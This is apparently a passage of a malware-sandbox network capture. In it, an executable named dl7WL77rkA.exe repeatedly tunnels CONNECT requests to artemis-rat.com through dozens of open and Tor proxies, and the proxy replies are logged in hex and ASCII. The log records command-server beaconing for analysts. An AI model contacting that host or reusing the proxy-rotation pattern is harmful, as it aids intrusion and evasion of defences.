                                                                                                                                                                                                                                                            607192.168.2.551819104.23.126.8803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.978452921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.132911921 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            608192.168.2.551822104.27.37.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.978801012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.133044004 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            609192.168.2.55174845.11.95.16550393876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.978899002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.404139996 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            610192.168.2.55166845.251.231.11356783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.980252028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            611192.168.2.551845162.159.242.45803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.980309010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.141674995 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            612192.168.2.55180472.206.181.97649433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.980309010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            613192.168.2.55180672.210.252.13741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.980407953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            614192.168.2.55181172.195.34.35273603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.980411053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            615192.168.2.551739103.231.45.14510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.981930971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            616192.168.2.551793115.146.225.137100463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.981931925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            617192.168.2.55180094.131.14.6610813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.982175112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            618192.168.2.55178491.202.230.21980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.982352972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            619192.168.2.55182738.162.19.22731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.983340025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.398072958 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            620192.168.2.55178545.11.95.16660093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.983649969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.479053974 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            621192.168.2.551155117.160.250.163823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.983942986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701843023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.548237085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202133894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.161202908 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.161174059 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            622192.168.2.55181358.234.116.19781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.988347054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            623192.168.2.55182470.166.167.38577283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.988594055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            624192.168.2.551799138.36.150.2610803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.988960028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            625192.168.2.551808121.41.66.24280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.990400076 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.321501017 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            626192.168.2.55182972.195.114.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.990400076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            627192.168.2.55086251.15.234.222163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.999111891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108052015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.555661917 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            628192.168.2.551667148.72.206.250140763876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.001502037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.779822111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092638969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405534029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.999075890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.592834949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.202116966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            629192.168.2.551831147.75.92.251100893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.002300024 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
